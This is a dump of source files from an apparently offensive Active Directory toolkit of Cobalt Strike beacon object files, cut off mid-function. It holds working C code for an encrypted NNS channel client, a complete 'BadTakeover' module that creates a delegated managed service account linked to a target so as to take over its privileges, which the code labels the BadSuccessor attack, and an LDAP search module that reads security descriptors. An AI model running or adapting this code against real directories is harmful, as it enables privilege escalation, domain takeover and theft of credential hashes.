        BeaconPrintf(CALLBACK_OUTPUT, "[-] Expected HANDSHAKE_DONE, got: 0x%02X\n", messageType);
        intFree(doneBuffer);
        return FALSE;
    }

    intFree(doneBuffer);

    // Query context for sizes before encryption
    status = SECUR32$QueryContextAttributesW(&ctx->hContext, SECPKG_ATTR_SIZES, &ctx->sizes);
    if (status != SEC_E_OK)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] QueryContextAttributes failed: 0x%08X\n", status);
        return FALSE;
    }

    BYTE preambleEnd = NMF_PREAMBLE_END;
    if (!NNSSendEncrypted(ctx, &preambleEnd, 1))
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Failed to send encrypted preamble end\n");
        return FALSE;
    }

    PBYTE response = NULL;
    DWORD responseLen = 0;
    if (!NNSReceiveEncrypted(ctx, &response, &responseLen))
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Failed to receive encrypted preamble ack\n");
        return FALSE;
    }

    if (responseLen != 1 || response[0] != NMF_PREAMBLE_ACK)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Invalid preamble ack: 0x%02X\n", response[0]);
        intFree(response);
        return FALSE;
    }

    intFree(response);

    ctx->isAuthenticated = TRUE;
    return TRUE;
}

// Send NNS message with header
BOOL NNSSendMessage(SOCKET socket, BYTE type, PBYTE data, DWORD dataLen)
{
    BYTE *buffer = (BYTE *)intAlloc(5 + dataLen);
    if (!buffer)
        return FALSE;

    buffer[0] = type;
    buffer[1] = 0x01;
    buffer[2] = 0x00;
    buffer[3] = (BYTE)((dataLen >> 8) & 0xFF);
    buffer[4] = (BYTE)(dataLen & 0xFF);

    if (data && dataLen > 0)
    {
        MSVCRT$memcpy(buffer + 5, data, dataLen);
    }

    int ret = WS2_32$send(socket, (char *)buffer, 5 + dataLen, 0);
    intFree(buffer);

    return (ret != SOCKET_ERROR);
}

// Receive NNS message, handling partial receives also
BOOL NNSReceiveMessage(SOCKET socket, BYTE *type, PBYTE *data, DWORD *dataLen)
{
    BYTE header[5];
    int ret;
    int total = 0;

    // Receive header
    while (total < 5)
    {
        ret = WS2_32$recv(socket, (char *)(header + total), 5 - total, 0);
        if (ret <= 0)
        {
            return FALSE;
        }
        total += ret;
    }

    *type = header[0];
    *dataLen = (header[3] << 8) | header[4];

    if (*dataLen > 0)
    {
        *data = (PBYTE)intAlloc(*dataLen);
        if (!*data)
            return FALSE;

        // Receive payload
        total = 0;
        while (total < (int)*dataLen)
        {
            ret = WS2_32$recv(socket, (char *)(*data + total), *dataLen - total, 0);
            if (ret <= 0)
            {
                intFree(*data);
                return FALSE;
            }
            total += ret;
        }
    }
    else
    {
        *data = NULL;
    }

    return TRUE;
}

// Send encrypted NNS message
BOOL NNSSendEncrypted(CONNECTION_CONTEXT *ctx, PBYTE data, DWORD dataLen)
{
    SecBufferDesc messageDesc;
    SecBuffer messageBuffers[3];
    SECURITY_STATUS status;
    BYTE *sendBuffer = NULL;
    DWORD sendLen;
    int ret;

    // Allocate buffer for encrypted data
    sendLen = ctx->sizes.cbSecurityTrailer + dataLen + ctx->sizes.cbBlockSize;
    sendBuffer = (BYTE *)intAlloc(sendLen + 4);
    if (!sendBuffer)
        return FALSE;

    // Setup buffers
    messageBuffers[0].BufferType = SECBUFFER_TOKEN;
    messageBuffers[0].cbBuffer = ctx->sizes.cbSecurityTrailer;
    messageBuffers[0].pvBuffer = sendBuffer + 4;

    messageBuffers[1].BufferType = SECBUFFER_DATA;
    messageBuffers[1].cbBuffer = dataLen;
    messageBuffers[1].pvBuffer = sendBuffer + 4 + ctx->sizes.cbSecurityTrailer;
    MSVCRT$memcpy(messageBuffers[1].pvBuffer, data, dataLen);

    messageBuffers[2].BufferType = SECBUFFER_PADDING;
    messageBuffers[2].cbBuffer = ctx->sizes.cbBlockSize;
    messageBuffers[2].pvBuffer = sendBuffer + 4 + ctx->sizes.cbSecurityTrailer + dataLen;

    messageDesc.ulVersion = SECBUFFER_VERSION;
    messageDesc.cBuffers = 3;
    messageDesc.pBuffers = messageBuffers;

    status = SECUR32$EncryptMessage(&ctx->hContext, 0, &messageDesc, 0);
    if (status != SEC_E_OK)
    {
        intFree(sendBuffer);
        return FALSE;
    }

    // Calculate total encrypted size
    sendLen = messageBuffers[0].cbBuffer + messageBuffers[1].cbBuffer + messageBuffers[2].cbBuffer;

    // Write length header (little-endian)
    sendBuffer[0] = (BYTE)(sendLen & 0xFF);
    sendBuffer[1] = (BYTE)((sendLen >> 8) & 0xFF);
    sendBuffer[2] = (BYTE)((sendLen >> 16) & 0xFF);
    sendBuffer[3] = (BYTE)((sendLen >> 24) & 0xFF);

    ret = WS2_32$send(ctx->socket, (char *)sendBuffer, sendLen + 4, 0);
    intFree(sendBuffer);

    return (ret != SOCKET_ERROR);
}

// Receive encrypted NNS message - handles multiple chunks if needed
BOOL NNSReceiveEncrypted(CONNECTION_CONTEXT *ctx, PBYTE *data, DWORD *dataLen)
{
    BYTE lengthHeader[4];
    DWORD encryptedLen;
    BYTE *encryptedData = NULL;
    SecBufferDesc messageDesc;
    SecBuffer messageBuffers[2];
    SECURITY_STATUS status;
    int ret;
    int total = 0;

    // First receive the initial chunk
    // Receive length header
    while (total < 4)
    {
        ret = WS2_32$recv(ctx->socket, (char *)(lengthHeader + total), 4 - total, 0);
        if (ret <= 0)
        {
            int error = WS2_32$WSAGetLastError();
            BeaconPrintf(CALLBACK_OUTPUT, "[-] recv failed in length header: ret=%d, WSAError=%d\n", ret, error);
            return FALSE;
        }
        total += ret;
    }

    // Parse length (little-endian)
    encryptedLen = lengthHeader[0] | (lengthHeader[1] << 8) | (lengthHeader[2] << 16) | (lengthHeader[3] << 24);

    // Receive encrypted data
    encryptedData = (BYTE *)intAlloc(encryptedLen);
    if (!encryptedData)
        return FALSE;

    total = 0;
    while (total < (int)encryptedLen)
    {
        ret = WS2_32$recv(ctx->socket, (char *)(encryptedData + total), encryptedLen - total, 0);
        if (ret <= 0)
        {
            intFree(encryptedData);
            return FALSE;
        }
        total += ret;
    }

    // Setup buffers for decryption
    messageBuffers[0].BufferType = SECBUFFER_STREAM;
    messageBuffers[0].cbBuffer = encryptedLen;
    messageBuffers[0].pvBuffer = encryptedData;

    messageBuffers[1].BufferType = SECBUFFER_DATA;
    messageBuffers[1].cbBuffer = 0;
    messageBuffers[1].pvBuffer = NULL;

    messageDesc.ulVersion = SECBUFFER_VERSION;
    messageDesc.cBuffers = 2;
    messageDesc.pBuffers = messageBuffers;

    ULONG qop;
    status = SECUR32$DecryptMessage(&ctx->hContext, &messageDesc, 0, &qop);
    if (status != SEC_E_OK)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] DecryptMessage failed: 0x%08X\n", status);
        intFree(encryptedData);
        return FALSE;
    }

    // Find data buffer
    BYTE *decryptedData = NULL;
    DWORD decryptedLen = 0;
    for (ULONG i = 0; i < messageDesc.cBuffers; i++)
    {
        if (messageBuffers[i].BufferType == SECBUFFER_DATA)
        {
            decryptedLen = messageBuffers[i].cbBuffer;
            decryptedData = (BYTE *)messageBuffers[i].pvBuffer;
            break;
        }
    }

    if (!decryptedData || decryptedLen == 0)
    {
        intFree(encryptedData);
        return FALSE;
    }

    // Checks if this is a truncated NMF message that needs more data
    if (decryptedLen > 0 && decryptedData[0] == NMF_SIZED_ENVELOPE)
    {
        // Parse the NMF varint to see expected size
        DWORD offset = 1;
        DWORD expectedPayloadLen = 0;
        if (offset < decryptedLen)
        {
            BYTE firstByte = decryptedData[offset++];
            if ((firstByte & 0x80) == 0)
            {
                expectedPayloadLen = firstByte;
            }
            else
            {
                expectedPayloadLen = firstByte & 0x7F;
                int shift = 7;
                while (offset < decryptedLen && shift < 32)
                {
                    BYTE nextByte = decryptedData[offset++];
                    expectedPayloadLen |= (DWORD)(nextByte & 0x7F) << shift;
                    if ((nextByte & 0x80) == 0)
                        break;
                    shift += 7;
                }
            }

            DWORD totalExpected = offset + expectedPayloadLen;

            // If we need more data, receive additional chunks
            if (totalExpected > decryptedLen)
            {

                // Allocate buffer for complete message
                BYTE *fullMessage = (BYTE *)intAlloc(totalExpected + 1024);
                if (!fullMessage)
                {
                    intFree(encryptedData);
                    return FALSE;
                }

                MSVCRT$memcpy(fullMessage, decryptedData, decryptedLen);
                DWORD currentLen = decryptedLen;

                intFree(encryptedData);

                // Receive additional chunks
                while (currentLen < totalExpected)
                {
                    // Check if more data is available with MSG_PEEK
                    BYTE peekBuf[4];
                    ret = WS2_32$recv(ctx->socket, (char *)peekBuf, 4, MSG_PEEK);
                    if (ret <= 0)
                    {
                        break;
                    }

                    // Receive next chunk header
                    total = 0;
                    while (total < 4)
                    {
                        ret = WS2_32$recv(ctx->socket, (char *)(lengthHeader + total), 4 - total, 0);
                        if (ret <= 0)
                            break;
                        total += ret;
                    }
                    if (total < 4)
                        break;

                    // Parse chunk length
                    encryptedLen =
                        lengthHeader[0] | (lengthHeader[1] << 8) | (lengthHeader[2] << 16) | (lengthHeader[3] << 24);

                    // Receive chunk data
                    encryptedData = (BYTE *)intAlloc(encryptedLen);
                    if (!encryptedData)
                    {
                        intFree(fullMessage);
                        return FALSE;
                    }

                    total = 0;
                    while (total < (int)encryptedLen)
                    {
                        ret = WS2_32$recv(ctx->socket, (char *)(encryptedData + total), encryptedLen - total, 0);
                        if (ret <= 0)
                            break;
                        total += ret;
                    }
                    if (total < (int)encryptedLen)
                    {
                        intFree(encryptedData);
                        break;
                    }

                    // Decrypt chunk
                    messageBuffers[0].BufferType = SECBUFFER_STREAM;
                    messageBuffers[0].cbBuffer = encryptedLen;
                    messageBuffers[0].pvBuffer = encryptedData;
                    messageBuffers[1].BufferType = SECBUFFER_DATA;
                    messageBuffers[1].cbBuffer = 0;
                    messageBuffers[1].pvBuffer = NULL;

                    status = SECUR32$DecryptMessage(&ctx->hContext, &messageDesc, 0, &qop);
                    if (status != SEC_E_OK)
                    {
                        intFree(encryptedData);
                        break;
                    }

                    // Find decrypted data
                    for (ULONG i = 0; i < messageDesc.cBuffers; i++)
                    {
                        if (messageBuffers[i].BufferType == SECBUFFER_DATA)
                        {
                            DWORD chunkDataLen = messageBuffers[i].cbBuffer;
                            if (currentLen + chunkDataLen <= totalExpected + 1024)
                            {
                                MSVCRT$memcpy(fullMessage + currentLen, messageBuffers[i].pvBuffer, chunkDataLen);
                                currentLen += chunkDataLen;
                            }
                            break;
                        }
                    }

                    intFree(encryptedData);
                }

                // Return the assembled message
                *dataLen = currentLen;
                *data = fullMessage;
                return TRUE;
            }
        }
    }

    // Single chunk case, just copy and return
    *dataLen = decryptedLen;
    *data = (PBYTE)intAlloc(decryptedLen);
    if (*data)
    {
        MSVCRT$memcpy(*data, decryptedData, decryptedLen);
    }

    intFree(encryptedData);
    return (*data != NULL);
}

#endif


================================================
FILE: AD-BOF/badtakeover/BadTakeover.c
================================================
#include <windows.h>
#include <winldap.h>
#include <winber.h>
#include <sddl.h>
#include "bofdefs.h"
#include "beacon.h"

#pragma comment(lib, "wldap32.lib")

void go(char *args, int len) {

    BeaconPrintf(CALLBACK_OUTPUT, "[*] BadTakeover BOF started\n");
    datap parser;
    BeaconDataParse(&parser, args, len);

    char *path     = BeaconDataExtract(&parser, NULL);
    char *dMSAname = BeaconDataExtract(&parser, NULL);
    char *access   = BeaconDataExtract(&parser, NULL);
    char *target   = BeaconDataExtract(&parser, NULL);
    char *domain   = BeaconDataExtract(&parser, NULL);

    LDAP *ld = NULL;
    int result;
    int version = LDAP_VERSION3;

    ULONG rc;

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Connecting to LDAP\n");
    ld = WLDAP32$ldap_init(domain, LDAP_PORT);
    if (ld == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "LDAP init failed\n");
        return;
    }

    result = WLDAP32$ldap_set_option(ld, LDAP_OPT_PROTOCOL_VERSION, &version);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "Set version failed: %s\n", WLDAP32$ldap_err2string(result));
        goto cleanup;
    }

    result = WLDAP32$ldap_bind_s(ld, NULL, NULL, LDAP_AUTH_NEGOTIATE);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "Bind failed: %s\n", WLDAP32$ldap_err2string(result));
        goto cleanup;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Connected to LDAP successfully\n");

    // Buffers
    char childDn[512];
    char dnsHostName[512];
    char samAccountName[512];


    // childDn = "CN=" + dMSAname + "," + path
    MSVCRT$strcpy(childDn, "CN=");
    MSVCRT$strcat(childDn, dMSAname);
    MSVCRT$strcat(childDn, ",");
    MSVCRT$strcat(childDn, path);

    // dnsHostName = dMSAname + "." + domain
    MSVCRT$strcpy(dnsHostName, dMSAname);
    MSVCRT$strcat(dnsHostName, ".");
    MSVCRT$strcat(dnsHostName, domain);

    // samAccountName = dMSAname + "$"
    MSVCRT$strcpy(samAccountName, dMSAname);
    MSVCRT$strcat(samAccountName, "$");

    BeaconPrintf(CALLBACK_OUTPUT, "[+] dMSA DN: %s\n", childDn);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] dNSHostName: %s\n", dnsHostName);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] sAMAccountName: %s\n", samAccountName);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Target object for takeover: %s\n", target);

    LDAPModA modObjectClass, modMSAState, modInterval, modDns, modSam, linkAttr, encAttr, uacAttr, sdAttr;
    LDAPModA *mods[10];

    char *objectClassVals[] = { "msDS-DelegatedManagedServiceAccount", NULL };
    char *msaStateVals[]    = { "2", NULL };
    char *intervalVals[]    = { "30", NULL };
    char *dnsVals[]         = { dnsHostName, NULL };
    char *samVals[]         = { samAccountName, NULL };
    char *linkVals[] = { target, NULL };
    char *encVals[]  = { "28", NULL };   // 0x1c
    char *uacVals[]  = { "4096", NULL }; // 0x1000

    char sddl[256];
    MSVCRT$strcpy(sddl, "O:S-1-5-32-544D:(A;;0xf01ff;;;");
    MSVCRT$strcat(sddl, access);  // access = SID of target object
    MSVCRT$strcat(sddl, ")");

    BeaconPrintf(CALLBACK_OUTPUT, "[+] SDDL value for accessing target object: %s\n", sddl);

    PSECURITY_DESCRIPTOR pSD = NULL;
    ULONG sdSize = 0;

    rc = ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorA(
        sddl,
        SDDL_REVISION_1,
        &pSD,
        &sdSize
    );

    if (rc == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] ConvertStringSecurityDescriptorToSecurityDescriptor failed\n");
    }

    struct berval sdVal, *sdVals[2];
    sdVal.bv_len = sdSize;       // previously converted from SDDL
    sdVal.bv_val = (char*)pSD;
    sdVals[0] = &sdVal;
    sdVals[1] = NULL;

    modObjectClass.mod_op     = LDAP_MOD_ADD;
    modObjectClass.mod_type   = "objectClass";
    modObjectClass.mod_values = objectClassVals;

    modMSAState.mod_op     = LDAP_MOD_ADD;
    modMSAState.mod_type   = "msDS-DelegatedMSAState";
    modMSAState.mod_values = msaStateVals;

    modInterval.mod_op     = LDAP_MOD_ADD;
    modInterval.mod_type   = "msDS-ManagedPasswordInterval";
    modInterval.mod_values = intervalVals;

    modDns.mod_op     = LDAP_MOD_ADD;
    modDns.mod_type   = "dNSHostName";
    modDns.mod_values = dnsVals;

    modSam.mod_op     = LDAP_MOD_ADD;
    modSam.mod_type   = "sAMAccountName";
    modSam.mod_values = samVals;

    linkAttr.mod_op     = LDAP_MOD_ADD;
    linkAttr.mod_type   = "msDS-ManagedAccountPrecededByLink";
    linkAttr.mod_values = linkVals;

    encAttr.mod_op     = LDAP_MOD_ADD;
    encAttr.mod_type   = "msDS-SupportedEncryptionTypes";
    encAttr.mod_values = encVals;

    uacAttr.mod_op     = LDAP_MOD_ADD;
    uacAttr.mod_type   = "userAccountControl";
    uacAttr.mod_values = uacVals;

    sdAttr.mod_op     = LDAP_MOD_ADD | LDAP_MOD_BVALUES;
    sdAttr.mod_type   = "msDS-GroupMSAMembership";
    sdAttr.mod_bvalues = sdVals;

    mods[0] = &modObjectClass;
    mods[1] = &modMSAState;
    mods[2] = &modInterval;
    mods[3] = &modDns;
    mods[4] = &modSam;

    mods[5] = &linkAttr;
    mods[6] = &encAttr;
    mods[7] = &uacAttr;
    mods[8] = &sdAttr;
    mods[9] = NULL;

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting to add object: %s\n", childDn);

    result = WLDAP32$ldap_add_s(ld, childDn, mods);
    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add entry: %s\n", WLDAP32$ldap_err2string(result));
        goto cleanup;
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added dMSA object: %s\n", dMSAname);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] BadSuccessor attack complete. The dMSA object is now linked to the target.\n");
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Use Rubeus or Kerbeus BOF to retrieve TGS and password hash.\n");

cleanup:
    if (ld != NULL) {
        WLDAP32$ldap_unbind(ld);
    }
}

================================================
FILE: AD-BOF/ldapsearch/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: AD-BOF/ldapsearch/ldapsearch.c
================================================
#include <windows.h>
#include <dsgetdc.h>
#include <winldap.h>
#include <winber.h>
#include <rpc.h>
#include <lm.h>
#include <sddl.h>
#include <rpcdce.h>
#include <stdint.h>
#define DYNAMIC_LIB_COUNT 1

#include "base.c"
#define SECURITY_WIN32
#include <secext.h> 

#define MAX_ATTRIBUTES 100

typedef long (*_fuuidtostring)(UUID *Uuid,RPC_CSTR *StringUuid);
typedef long (*_RpcStringFreeA)(RPC_CSTR *String);
typedef ULONG LDAPAPI (*_ldap_search_abondon_page)(PLDAP h, PLDAPSearch S);
_fuuidtostring fuuidtostring = (void *)1;
_RpcStringFreeA frpcstringfree = (void *)1;
HMODULE rpcrt = (void *)1; 

typedef LDAP *LDAPAPI (*ldap_init_t)(PSTR HostName, ULONG PortNumber);
typedef ULONG LDAPAPI (*ldap_set_optionW_t)(LDAP *ld, int option, const void *invalue);
typedef ULONG LDAPAPI (*ldap_get_optionW_t)(LDAP *ld, int option,  void *invalue);
typedef ULONG LDAPAPI (*ldap_bind_s_t)(LDAP *ld, const PSTR dn, const PCHAR cred, ULONG method);
typedef ULONG LDAPAPI (*ldap_unbind_t)(LDAP*);
typedef ULONG LDAPAPI (*ldap_msgfree_t)(LDAPMessage*);
typedef VOID LDAPAPI (*ldap_memfree_t)(PCHAR);
typedef LDAPMessage* (*ldap_first_entry_t)(LDAP *ld,LDAPMessage *res);
typedef ULONG LDAPAPI (*ldap_get_next_page_s_t)(PLDAP ExternalHandle,PLDAPSearch SearchHandle,struct l_timeval *timeout,ULONG PageSize,ULONG *TotalCount,LDAPMessage **Results);
typedef ULONG LDAPAPI (*ldap_count_entries_t)(LDAP*,LDAPMessage*);
typedef LDAPMessage*  (*ldap_next_entry_t)(LDAP*,LDAPMessage*);
typedef PCHAR LDAPAPI (*ldap_first_attribute_t)(LDAP *ld,LDAPMessage *entry,BerElement **ptr);
typedef struct berval **LDAPAPI (*ldap_get_values_lenA_t)(LDAP *ExternalHandle,LDAPMessage *Message,const PCHAR attr);
typedef PCHAR * LDAPAPI (*ldap_get_values_t)(LDAP *ld,LDAPMessage *entry,const PSTR attr);
typedef ULONG LDAPAPI (*ldap_value_free_len_t)(struct berval **vals);
typedef ULONG LDAPAPI (*ldap_value_free_t)(PCHAR *);
typedef PCHAR LDAPAPI (*ldap_next_attribute_t)(LDAP *ld,LDAPMessage *entry,BerElement *ptr);
typedef PLDAPSearch LDAPAPI (*ldap_search_init_pageA_t)(PLDAP ExternalHandle,const PCHAR DistinguishedName,ULONG ScopeOfSearch,const PCHAR SearchFilter,PCHAR AttributeList[],ULONG AttributesOnly,PLDAPControlA *ServerControls,PLDAPControlA *ClientControls,ULONG PageTimeLimit,ULONG TotalSizeLimit,PLDAPSortKeyA *SortKeys);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBERAPI BerElement *BERAPI WLDAP32$ber_alloc_t(INT options);
WINBERAPI INT BERAPI WLDAP32$ber_printf(BerElement *pBerElement, PSTR fmt, ...);
WINBERAPI INT BERAPI WLDAP32$ber_flatten(BerElement *pBerElement, PBERVAL *pBerVal);
WINLDAPAPI VOID LDAPAPI WLDAP32$ber_bvfree(PBERVAL bv);

#define WLDAP32$ldap_init ((ldap_init_t)DynamicLoad("WLDAP32", "ldap_init"))
#define WLDAP32$ldap_set_optionW ((ldap_set_optionW_t)DynamicLoad("WLDAP32", "ldap_set_optionW"))
#define WLDAP32$ldap_get_optionW ((ldap_get_optionW_t)DynamicLoad("WLDAP32", "ldap_get_optionW"))
#define WLDAP32$ldap_bind_s ((ldap_bind_s_t)DynamicLoad("WLDAP32", "ldap_bind_s"))
#define WLDAP32$ldap_unbind ((ldap_unbind_t)DynamicLoad("WLDAP32", "ldap_unbind"))
#define WLDAP32$ldap_msgfree ((ldap_msgfree_t)DynamicLoad("WLDAP32", "ldap_msgfree"))
#define WLDAP32$ldap_memfree ((ldap_memfree_t)DynamicLoad("WLDAP32", "ldap_memfree"))
#define WLDAP32$ldap_first_entry ((ldap_first_entry_t)DynamicLoad("WLDAP32", "ldap_first_entry"))
#define WLDAP32$ldap_get_next_page_s ((ldap_get_next_page_s_t)DynamicLoad("WLDAP32", "ldap_get_next_page_s"))
#define WLDAP32$ldap_count_entries ((ldap_count_entries_t)DynamicLoad("WLDAP32", "ldap_count_entries"))
#define WLDAP32$ldap_next_entry ((ldap_next_entry_t)DynamicLoad("WLDAP32", "ldap_next_entry"))
#define WLDAP32$ldap_first_attribute ((ldap_first_attribute_t)DynamicLoad("WLDAP32", "ldap_first_attribute"))
#define WLDAP32$ldap_get_values_lenA ((ldap_get_values_lenA_t)DynamicLoad("WLDAP32", "ldap_get_values_lenA"))
#define WLDAP32$ldap_get_values ((ldap_get_values_t)DynamicLoad("WLDAP32", "ldap_get_values"))
#define WLDAP32$ldap_value_free_len ((ldap_value_free_len_t)DynamicLoad("WLDAP32", "ldap_value_free_len"))
#define WLDAP32$ldap_value_free ((ldap_value_free_t)DynamicLoad("WLDAP32", "ldap_value_free"))
#define WLDAP32$ldap_next_attribute ((ldap_next_attribute_t)DynamicLoad("WLDAP32", "ldap_next_attribute"))
#define WLDAP32$ldap_search_init_pageA ((ldap_search_init_pageA_t)DynamicLoad("WLDAP32", "ldap_search_init_pageA"))

VERIFYSERVERCERT ServerCertCallback;
BOOLEAN _cdecl ServerCertCallback (PLDAP Connection, PCCERT_CONTEXT pServerCert)
{
	return TRUE;
}
void ConvertUnicodeStringToChar(const wchar_t* src, size_t srcSize, char* dst, size_t dstSize)
{
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, src, (int)srcSize, dst, (int)dstSize, NULL, NULL);
    dst[dstSize - 1] = '\0';
}

//https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ldap/ldap-server-sd-flags-oid
// Set LDAP server control flags so low-privileged domain users can read nTSecurityDescriptor attribute
PLDAPControlA FormatSDFlags(int iFlagValue) {
	BerElement *pber = NULL;
	PLDAPControl pLControl = NULL;
	PBERVAL pldctrl_value = NULL;
	int success = -1;
	// Format and encode the SEQUENCE data in a BerElement.
	pber = WLDAP32$ber_alloc_t(LBER_USE_DER);
	if(pber==NULL) return NULL;
	pLControl = (PLDAPControl)MSVCRT$malloc(sizeof(LDAPControl));
	if(pLControl==NULL) { WLDAP32$ber_free(pber,1); return NULL; }
	WLDAP32$ber_printf(pber,"{i}",iFlagValue);
	
	// Transfer the encoded data into a BERVAL.
	success = WLDAP32$ber_flatten(pber,&pldctrl_value);
	if(success == 0)
		WLDAP32$ber_free(pber,1);
	else {
		BeaconPrintf(CALLBACK_ERROR, "ber_flatten failed!");
		// Call error handler here.
	}
	// Copy the BERVAL data to the LDAPControl structure.
	pLControl->ldctl_oid = "1.2.840.113556.1.4.801";
	pLControl->ldctl_iscritical = TRUE;
	pLControl->ldctl_value.bv_val = (char*)MSVCRT$malloc((size_t)pldctrl_value->bv_len);
	memcpy(pLControl->ldctl_value.bv_val, pldctrl_value->bv_val, pldctrl_value->bv_len);
	pLControl->ldctl_value.bv_len = pldctrl_value->bv_len;
	
	// Cleanup temporary berval.
	WLDAP32$ber_bvfree(pldctrl_value);
	// Return the formatted LDAPControl data.
	return pLControl;
}

// https://opensource.apple.com/source/QuickTimeStreamingServer/QuickTimeStreamingServer-452/CommonUtilitiesLib/base64.c.auto.html
static const char basis_64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

int Base64encode(char* encoded, const char* string, int len) {
	int i;
	char* p;

	p = encoded;
	for (i = 0; i < len - 2; i += 3) {
